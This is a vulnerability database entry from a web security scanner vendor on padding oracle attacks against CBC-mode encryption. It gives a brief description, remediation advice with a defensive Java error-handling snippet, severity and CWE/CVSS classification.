Web Application Vulnerabilities Runtime SCA Findings
Looking for the vulnerability index of Invicti's legacy products?
Invicti Enterprise Acunetix Standard & Premium
Padding oracle attack - Vulnerability Database

Padding oracle attack

Description

Manual confirmation is required for this alert.

This application may be vulnerable to a Padding Oracle Attack, a cryptographic side-channel vulnerability affecting CBC-mode encryption with PKCS#5/PKCS#7 padding. The vulnerability occurs when an application reveals whether decrypted ciphertext has valid or invalid padding through error messages, response times, or HTTP status codes. An attacker can exploit these subtle differences to decrypt encrypted data byte-by-byte without possessing the encryption key, effectively breaking the confidentiality of the encrypted communication.

Remediation

Implement the following measures to prevent padding oracle attacks:

1. Use Authenticated Encryption: Replace CBC-mode encryption with authenticated encryption modes such as GCM (Galois/Counter Mode) or use encrypt-then-MAC constructions. This prevents tampering and eliminates padding oracle vulnerabilities.

2. Implement Uniform Error Handling: Ensure that all decryption errors (invalid padding, MAC verification failures, etc.) return identical error messages and take the same amount of time to process. Never distinguish between padding errors and other decryption failures in responses.

3. Apply Constant-Time Operations: Use constant-time comparison functions and ensure decryption operations complete in consistent time regardless of padding validity.

4. Validate MAC Before Decryption: If using encrypt-then-MAC, verify the MAC before attempting decryption and reject invalid messages immediately with generic error responses.

Example of uniform error handling:

try {
    byte[] decrypted = cipher.doFinal(ciphertext);
    // Process decrypted data
} catch (BadPaddingException | IllegalBlockSizeException e) {
    // Log error internally without details
    logger.warn("Decryption failed");
    // Return generic error to client
    throw new SecurityException("Invalid request");
}

5. Consider Modern Alternatives: Migrate to modern cryptographic libraries and protocols (such as TLS 1.3, libsodium, or NaCl) that provide secure defaults and built-in protection against padding oracle attacks.

References

Practical Padding Oracle Attacks
Automated Padding Oracle Attacks with PadBuster

Related Vulnerabilities

ASP.NET CustomErrors Is Disabled Medium
Common tags: Information Disclosure Configuration Error Handling
CodeIgniter development mode enabled Medium
Common tags: Information Disclosure Configuration Error Handling
Elmah.axd / Errorlog.axd Detected High
Common tags: Information Disclosure Configuration Error Handling
Error page web server version disclosure Information
Common tags: Information Disclosure Configuration Error Handling
Error page path disclosure Low
Common tags: Information Disclosure Configuration Error Handling

Severity

High

Classification

CWE-209
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Tags

Information Disclosure
Configuration
Error Handling
Weak Crypto